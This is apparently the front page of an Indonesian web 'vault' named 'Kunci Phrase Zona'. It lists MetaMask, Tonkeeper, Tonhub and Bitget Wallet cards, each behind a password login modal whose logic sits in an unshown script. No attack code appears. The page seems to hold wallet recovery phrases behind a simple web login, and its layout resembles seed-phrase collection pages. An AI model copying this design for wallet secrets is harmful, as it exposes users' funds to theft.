<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="styles.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
    <title>Kunci Phrase Zona</title>
</head>
<body>
    <div class="header">
        <div class="logo">Kunci Phrase Zona</div>
        <div class="search-bar">
            <input type="text" placeholder="cari vault saya">
        </div>
    </div>
    <div class="container">
        <div class="section-title">wallet</div>
        <div class="site-grid">
            <!-- MetaMask -->
            <div class="site-card" onclick="openLoginModal('lzonsb/2739.html')">
                <img src="logo/metamask.png" alt="MetaMask logo">
                <div class="site-name">MetaMask</div>
            </div>
            <!-- Tonkeeper -->
            <div class="site-card" onclick="openLoginModal('lzonsb/1028.html')">
                <img src="logo/tonkeeper.png" alt="Tonkeeper logo">
                <div class="site-name">Tonkeeper</div>
            </div>
            <!-- Tonhub -->
            <div class="site-card" onclick="openLoginModal('lzonsb/9273.html')">
                <img src="logo/tonhub.png" alt="Tonhub logo">
                <div class="site-name">Tonhub</div>
            </div>
            <!-- Bitget Wallet -->
            <div class="site-card" onclick="openLoginModal('lzonsb/10202.html')">
                <img src="logo/bitget.png" alt="Bitget Wallet logo">
                <div class="site-name">Bitget Wallet</div>
            </div>
        </div>
    </div>
    <div class="footer">
        <button class="add-button">+</button>
    </div>
    <div id="login-modal" class="modal">
        <div class="modal-content">
            <span class="close" onclick="closeModal()">&times;</span>
            <h2>Login</h2>
            <input type="password" id="password" placeholder="Masukkan Password">
            <button onclick="login()">Login</button>
            <div id="error" class="error"></div>
        </div>
    </div>
    <script src="script.js"></script>
</body>
</html>
